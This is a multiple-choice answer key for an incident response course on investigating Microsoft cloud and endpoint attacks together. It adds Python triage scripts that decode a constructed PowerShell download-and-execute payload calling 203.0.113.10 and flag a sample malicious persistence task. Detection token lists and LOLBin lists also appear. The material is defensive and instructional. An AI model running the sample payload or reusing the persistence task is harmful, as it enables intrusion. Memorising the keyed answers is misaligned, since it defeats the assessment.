1. Why does this course insist on investigating the cloud and the endpoint together rather than treating them as separate specialisms?
Because the same forensic tools are used for both, which reduces the training overhead
Because Microsoft recommends a unified approach in its official IR documentation
Because modern Microsoft-stack attacks cross the cloud-endpoint boundary in minutes, and an investigation limited to one side produces a containment plan the attacker routes around via the unexamined side
Because it is faster to query a single portal than to switch between two
Correct. The investigation scope has to match the attack scope. An AiTM attack that harvests cloud credentials almost always delivers an endpoint payload as well, and the endpoint compromise persists after a cloud-side reset if the endpoint investigation never happened. A ransomware intrusion that encrypts endpoints almost always leaves cloud persistence — OAuth apps, transport rules, service principals — that survives the endpoint rebuild. Cloud-only or endpoint-only investigation produces half an answer and a containment plan that leaves the other half of the attacker in place.
2. You find a PowerShell process creation record showing powershell.exe executed at 15:09 with an encoded command line, launched by outlook.exe, under the user account of the affected employee. Which statement correctly applies the three-statement evidence discipline?
This proves the attacker executed PowerShell at 15:09 after obtaining the user's credentials
This proves nothing conclusive, because process creation records can be tampered with
This proves PowerShell was executed at 15:09 under the user's context with an encoded command line and an Outlook parent process; it does not prove whether the user or the attacker initiated the execution, or whether the encoded payload was malicious; the next step is to decode the payload, correlate with the user's email events around 15:09, and check network events from the process
This proves the user's credentials were compromised and PowerShell was used maliciously
Correct. Proves: PowerShell was executed at 15:09 under the user's logged-in context, with an encoded command line, launched by Outlook, an unusual parent for PowerShell. Does not prove: whether the user or an attacker initiated the execution (the account context tells you the logged-in session, not who controlled the keyboard), whether the encoded payload is actually malicious (encoded PowerShell has legitimate uses, and -EncodedCommand is just Base64 over UTF-16LE text, so decoding it is a one-liner), or what the payload does. Next step: decode the payload, pull EmailEvents, EmailAttachmentInfo and UrlClickEvents for the fifteen minutes before 15:09 to identify the trigger message, and check DeviceNetworkEvents for outbound connections from that process ID. The three-statement pattern keeps the investigation honest and the conclusions defensible.
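The next step in that explanation, worked through on constructed records as an added example (this is not course material): decode the -EncodedCommand argument, which PowerShell reads as Base64 over UTF-16LE text, pull out URLs and download-and-execute idioms, and narrow the EmailEvents and DeviceNetworkEvents records to those that could bound the 15:09 execution. The column names follow the Defender XDR advanced hunting tables named above, but the records, the payload, the mailbox, the device name and the 203.0.113.10 address are all made up for the demonstration.

```python
"""Three-statement discipline applied to the 15:09 PowerShell record: decode the
-EncodedCommand payload, extract indicators, and pull the email and network records
that bound the next step. Added example for this answer key, not course code.
The record layouts mirror the Defender XDR advanced hunting tables named in the
answer (DeviceProcessEvents, EmailEvents, DeviceNetworkEvents) but every record
below is constructed by hand for the demonstration."""
import base64
import re
from datetime import datetime, timedelta

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# "-e" followed by another letter (e.g. -ExecutionPolicy) is excluded because the
# optional group must be followed by whitespace.
ENC_RE = re.compile(r"-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
SUSPICIOUS_TOKENS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
                     "FromBase64String", "-w hidden", "-nop", "Net.WebClient")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand text, or None if there is none or it is
    not valid Base64 over UTF-16LE (which is what PowerShell expects)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_indicators(cmdline: str, decoded):
    """Cheap, explainable indicators: URLs and known download-and-execute idioms."""
    text = cmdline + "\n" + (decoded or "")
    low = text.lower()
    return {"urls": sorted(set(URL_RE.findall(text))),
            "tokens": [t for t in SUSPICIOUS_TOKENS if t.lower() in low]}


def correlate(proc: dict, emails: list, net: list, window_minutes: int = 15):
    """Return (candidate trigger emails, connections made by this process).
    This narrows what to read next; it does not decide who initiated anything."""
    start = proc["Timestamp"]
    lo = start - timedelta(minutes=window_minutes)
    triggers = [e for e in emails
                if e["RecipientEmailAddress"].lower() == proc["AccountUpn"].lower()
                and lo <= e["Timestamp"] <= start]
    conns = [n for n in net
             if n["DeviceName"] == proc["DeviceName"]
             and n["InitiatingProcessId"] == proc["ProcessId"]
             and n["Timestamp"] >= start]
    return triggers, conns


def _t(hhmm: str) -> datetime:  # constructed timestamps, all on one day
    return datetime(2025, 3, 4, int(hhmm[:2]), int(hhmm[3:]))


# Constructed payload; the encoded form is built here the same way PowerShell expects it.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()

PROC = {"Timestamp": _t("15:09"), "DeviceName": "fin-lt-07", "AccountUpn": "a.jones@example.com",
        "ProcessId": 4120, "InitiatingProcessFileName": "outlook.exe",
        "ProcessCommandLine": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}"}
EMAILS = [  # constructed EmailEvents rows
    {"Timestamp": _t("14:20"), "RecipientEmailAddress": "a.jones@example.com",
     "SenderFromAddress": "payroll@example.com", "Subject": "March payslip", "NetworkMessageId": "msg-001"},
    {"Timestamp": _t("15:02"), "RecipientEmailAddress": "a.jones@example.com",
     "SenderFromAddress": "invoices@supplier-billing.example", "Subject": "Overdue invoice 4471",
     "NetworkMessageId": "msg-002"},
    {"Timestamp": _t("15:05"), "RecipientEmailAddress": "b.singh@example.com",
     "SenderFromAddress": "invoices@supplier-billing.example", "Subject": "Overdue invoice 4471",
     "NetworkMessageId": "msg-003"},
]
NET = [  # constructed DeviceNetworkEvents rows
    {"Timestamp": _t("15:09"), "DeviceName": "fin-lt-07", "InitiatingProcessId": 4120,
     "RemoteIP": "203.0.113.10", "RemotePort": 80, "RemoteUrl": "http://203.0.113.10/a.ps1"},
    {"Timestamp": _t("15:10"), "DeviceName": "fin-lt-07", "InitiatingProcessId": 880,
     "RemoteIP": "198.51.100.20", "RemotePort": 443, "RemoteUrl": "updates.example.com"},
]


def investigate(proc=PROC, emails=EMAILS, net=NET) -> dict:
    decoded = decode_encoded_command(proc["ProcessCommandLine"])
    triggers, conns = correlate(proc, emails, net)
    return {"decoded": decoded,
            "indicators": extract_indicators(proc["ProcessCommandLine"], decoded),
            "trigger_candidates": triggers, "process_connections": conns}


if __name__ == "__main__":
    r = investigate()
    print("Decoded:", r["decoded"])
    print("Indicators:", r["indicators"])
    print("Trigger candidates:", [e["NetworkMessageId"] for e in r["trigger_candidates"]])
    print("Connections:", [(c["RemoteIP"], c["RemotePort"]) for c in r["process_connections"]])
```

Run as-is it returns the decoded payload, the single message that lands in the fifteen-minute window for that recipient (msg-002), and the single connection attributed to PID 4120; swap exported advanced hunting rows into PROC, EMAILS and NET to use it on real data. Note what it still does not tell you: whether a.jones opened that message, or whether someone else was driving the session. That remains the "does not prove" column until the mailbox and click telemetry say otherwise.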
3. According to current NIST guidance (SP 800-61 Revision 3), how does incident response relate to the phases you may remember from the 2012 Revision 2 lifecycle?
Revision 3 replaces the linear four-phase lifecycle with concurrent operations across six Functions of CSF 2.0 — Govern, Identify, Protect, Detect, Respond, Recover — where Detect, Respond, and Recover run in parallel during an active incident
Revision 3 added Govern and Recover as two new phases at the start and end of the Revision 2 lifecycle, preserving the four original phases in between
Revision 3 is an optional update; Revision 2's four-phase lifecycle is still NIST's primary incident response reference
Revision 3 is a US-federal-only document and does not apply to UK or EU organizations
Correct. NIST withdrew Revision 2 in April 2025 and replaced it entirely with Revision 3. The key structural change is that incident response is no longer modeled as a linear four-phase lifecycle. Rev 3 treats IR as activity distributed across the six CSF 2.0 Functions, with Detect, Respond, and Recover running concurrently during active incidents rather than sequentially. The other options describe common misconceptions: Rev 2 is fully withdrawn (not optional), Govern and Recover are Functions not appended phases, and NIST guidance is used globally regardless of where the organization is based.
4. You are writing an IR report that will be read by both the CISO (internal, operational) and the Head of Audit (external-facing, CSF 2.0-aligned). What is the current best practice for structuring it?
Write the entire report in CSF 2.0 Subcategory-reference language, because that is what the audit audience needs
Write an operational narrative in plain language that captures what happened, followed by a short framework mapping block that references the relevant CSF 2.0 Functions and Subcategories
Write two separate documents — one operational for the CISO, one framework-aligned for the Head of Audit
Skip the framework mapping entirely, because the operational narrative is what actually matters for containment decisions
Correct. Operational narrative first: what actually happened, in plain English a CFO can parse without a glossary, followed by a short mapping block that ties the findings to the CSF 2.0 Functions and Subcategories. This is legible to both audiences: the operational reader gets the story, the audit reader gets the mapping against the organization's plan. The first option buries the story under vocabulary. The third option doubles the work and doubles the risk of the two versions contradicting each other. The fourth option forces the audit reader to do the mapping themselves and signals out-of-date framework knowledge.
5. A finance-team employee clicks an AiTM phishing link at 14:31, and the initial alert in your queue is an Entra ID Protection anomalous-sign-in notification timestamped 14:42 (the token replay from the attacker's IP). It is now 15:20. Which of the four one-sided investigation failures is the most likely outcome if you investigate the alert cloud-side only?
The investigation will miss the supplier's bank details change, because that is an upstream process issue not visible in cloud logs
The investigation will contain the cloud side (session revocation, inbox rule removal, password reset) but miss the endpoint loader, the beacon in memory, and the harvested credential hashes — which the attacker will use to re-enter the environment via a different user weeks later
The investigation will be blocked at the initial validation step, because Entra ID Protection alerts cannot be triaged without endpoint context
The investigation will produce a forensically sound outcome, because the AiTM pattern is well-documented and cloud-side containment is the standard response
Correct. This is the specific failure mode illustrated in the NE scenario in IR0.1. Cloud-only containment removes the attacker from the identity plane but leaves the endpoint side of the attack — the loader on disk, the reflective beacon in memory, the harvested hashes including service account hashes — intact. The attacker retains a foothold that password resets do not reach. Weeks later, they re-authenticate using a service account hash, re-establish a beacon, and resume operations. The incident recurs. This is why the course insists on cross-plane investigation even when the alert only indicates cloud-side activity.
6. You are confirming a persistence mechanism and have two competing hypotheses. Hypothesis A: "The attacker created a scheduled task for persistence." Hypothesis B: "The attacker registered an OAuth application in Entra ID for persistence." You have time to test one first. Which tool-to-hypothesis mapping is correct?
Run Volatility 3 against a memory image, because memory forensics will reveal both persistence types
Run KAPE to collect triage artefacts from the endpoint, because KAPE captures everything relevant to both hypotheses
For Hypothesis A, query Task Scheduler event logs (Event ID 4698) or the registry key under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache. For Hypothesis B, query Entra ID audit logs for "Add service principal" and "Consent to application" events. The tool follows the hypothesis, not the other way around.
Run Microsoft Graph PowerShell against the tenant, because both persistence mechanisms are visible through the Graph API
Correct. This is the tool-first anti-pattern that the five-step reasoning chain prevents. The hypothesis determines the artefact, which determines the tool. For scheduled tasks, the evidence is in endpoint event logs or the TaskCache registry key, extracted via EZTools (EvtxECmd, Registry Explorer) against a KAPE collection. One caveat: Security event 4698 is only written when the Other Object Access Events audit subcategory is enabled, so on a host with the default audit policy fall back to the TaskCache key and the task XML files under C:\Windows\System32\Tasks, which exist regardless of audit settings. For OAuth app registration, the evidence is in Entra ID audit logs, extracted via KQL or Graph PowerShell against the tenant. Using memory forensics or triage collection as a starting point without a hypothesis produces the artefact-collector pattern: lots of output, no interpretation.
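For Hypothesis A, the artefact that exists regardless of audit policy is the task XML under C:\Windows\System32\Tasks, which a KAPE triage collection includes. The following is an added example, not course code: it parses that XML using the Task Scheduler schema namespace and emits triage flags for the properties worth a second look. Both task files are constructed; the one labelled malicious mirrors a typical PowerShell persistence task, the benign one a stock Microsoft telemetry task, and the Base64 blob in the malicious arguments is an opaque placeholder. The flags are prompts, not verdicts; the Author element is free text and trivially spoofed, so the 4698 event or the TaskCache key is where to confirm who actually registered the task.

```python
"""Hypothesis A tested against its artefact: parse Windows scheduled-task XML and
flag properties worth a second look. Added example for this answer key, not course
code. Both task files are constructed for the demonstration."""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
ENCODED_ARG = re.compile(r"-e(?:c|n\w*)?\s+[A-Za-z0-9+/=]{20,}", re.I)  # -enc <base64>


def parse_task_xml(raw: bytes) -> dict:
    """Task files on disk are UTF-16 with a BOM; expat detects that from the bytes."""
    root = ET.fromstring(raw)

    def text(path: str) -> str:
        return (root.findtext(path, default="", namespaces=NS) or "").strip()

    trig = root.find("t:Triggers", NS)
    return {
        "author": text("t:RegistrationInfo/t:Author"),
        "registered": text("t:RegistrationInfo/t:Date"),
        "run_as": text("t:Principals/t:Principal/t:UserId"),
        "run_level": text("t:Principals/t:Principal/t:RunLevel"),
        "hidden": text("t:Settings/t:Hidden").lower() == "true",
        "triggers": [] if trig is None else [el.tag.split("}")[-1] for el in trig],
        "actions": [{"command": (ex.findtext("t:Command", default="", namespaces=NS) or "").strip(),
                     "arguments": (ex.findtext("t:Arguments", default="", namespaces=NS) or "").strip()}
                    for ex in root.findall("t:Actions/t:Exec", NS)],
    }


def assess(task: dict) -> list:
    """Triage hints, not verdicts: each flag says where to look next."""
    flags = []
    if task["hidden"]:
        flags.append("hidden-task")
    for act in task["actions"]:
        exe = act["command"].replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()
        if exe in LOLBINS:
            flags.append(f"lolbin:{exe}")
        if ENCODED_ARG.search(act["arguments"]):
            flags.append("encoded-command")
        if USER_WRITABLE.search(act["command"] + " " + act["arguments"]):
            flags.append("user-writable-path")
    # Author is free text and trivially spoofed; this only prompts a check of the
    # registering account in the 4698 event or the TaskCache key.
    if task["run_as"] == "S-1-5-18" and not task["author"].lower().startswith("microsoft"):
        flags.append("system-principal-non-microsoft-author")
    return flags


def triage_tasks_dir(tasks_root: str) -> list:
    """Walk a collected Tasks tree (e.g. <KAPE dest>\\C\\Windows\\System32\\Tasks)."""
    out = []
    for p in Path(tasks_root).rglob("*"):
        if p.is_file():
            try:
                out.append((str(p), assess(parse_task_xml(p.read_bytes()))))
            except ET.ParseError:
                continue
    return out


# Constructed task files, encoded as UTF-16 with BOM like the real ones on disk.
MALICIOUS_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Date>2025-03-04T15:11:02</Date><Author>FIN-LT-07\\a.jones</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden><Enabled>true</Enabled></Settings>
  <Actions Context="Author"><Exec><Command>powershell.exe</Command>
    <Arguments>-nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA</Arguments>
  </Exec></Actions>
</Task>""".encode("utf-16")

BENIGN_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author></RegistrationInfo>
  <Triggers><CalendarTrigger><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="LocalSystem"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden><Enabled>true</Enabled></Settings>
  <Actions Context="LocalSystem"><Exec><Command>%windir%\\system32\\wsqmcons.exe</Command></Exec></Actions>
</Task>""".encode("utf-16")

if __name__ == "__main__":
    for label, raw in (("malicious", MALICIOUS_TASK), ("benign", BENIGN_TASK)):
        task = parse_task_xml(raw)
        print(label, task["author"], task["triggers"], task["actions"], assess(task))
```

Point triage_tasks_dir at the Tasks folder inside a KAPE destination to get one (path, flags) pair per task file; any task that fails to parse is skipped rather than crashing the run, which is itself worth noting because a task whose XML is missing or mangled while its TaskCache entry exists is a known tampering sign. The flags are deliberately narrow so the analyst still reads the task; the hypothesis is confirmed by the evidence, not by a scoring heuristic.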
7. A mid-level SOC analyst finishes this course. They work at an 800-person organization, investigate two to three incidents per month, and find that most of their investigation findings — attacker techniques their current detection rules did not catch — sit unused after the report is filed. With six hours per week available for skill development, which adjacent discipline has the highest expected operational return?
Deeper memory forensics, because nation-state tradecraft is an emerging threat
Detection engineering, because the analyst's own investigations already produce the raw material (attacker techniques their rules did not catch) that detection engineering converts into production rules — and each rule reduces the rate of future incidents of that class
Threat hunting, because proactive capability is always the right next investment
Network forensics, because the IR course does not cover the network telemetry side of investigation
Correct. The specific symptom described — findings go unused — points directly at the detection engineering gap. Every investigation produces findings; detection engineering is the discipline that converts them into rules that prevent recurrence. The skill compounds: each rule works for years after you write it, reducing the volume of incidents of that type. Memory forensics at depth is high-value but rarely exercised at two or three incidents per month. Hunting is valuable but presupposes detection-engineering maturity — hunting on top of a weak detection stack produces work the rules should have caught. Network forensics is worth pursuing when your environment has usable network telemetry, but for this analyst's described symptom, detection engineering is the sharpest fit.
8. You are the first responder on scene for an endpoint that shows signs of compromise from several days ago. The attacker has established persistence, but current activity pattern is data staging, not destruction — a beacon resident in memory, TCP connections to external IPs, and several gigabytes staged in a user-profile folder. The endpoint is reachable and you have forensic tools on a USB. What do you collect first?
Run KAPE immediately, because it collects the widest range of forensic artefacts quickly
Isolate the endpoint first to stop the data staging, then collect forensic evidence from the isolated system
Capture memory first with WinPMem, then run KAPE for the disk triage collection. Memory is the most volatile evidence: a reboot wipes it, network isolation drops the beacon's live connections and can cause it to exit or go dormant, and running KAPE first modifies the disk and memory state you are about to capture. Once the memory image is captured and hashed, proceed with disk collection
Run Volatility 3 against the live system, because it is the memory forensics tool
Correct. Order of volatility. Memory is the most volatile evidence class: a reflective beacon, its active network connections, decrypted credentials in LSASS, and injected code that never touched disk are all gone after a reboot, and network isolation, while it does not wipe memory, tears down those connections and can cause the beacon to exit or sleep before you image it. WinPMem acquires the memory image from the running system with a small footprint; write it to your external media rather than the system disk and hash it immediately. Running KAPE first writes to disk, modifies the MFT, loads processes, and changes the memory state you are about to capture. Once memory is captured and hashed, you proceed with KAPE for the disk collection, then isolate. Volatility 3 analyzes captured memory images; it does not capture memory from a live system, that is WinPMem's job. Isolation before evidence collection destroys the most volatile evidence; it is the right action when the attacker is actively destructive (active encryption, active deletion) but wrong when the current activity is data staging that you can interrupt a few minutes later without losing anything the memory capture has not already preserved.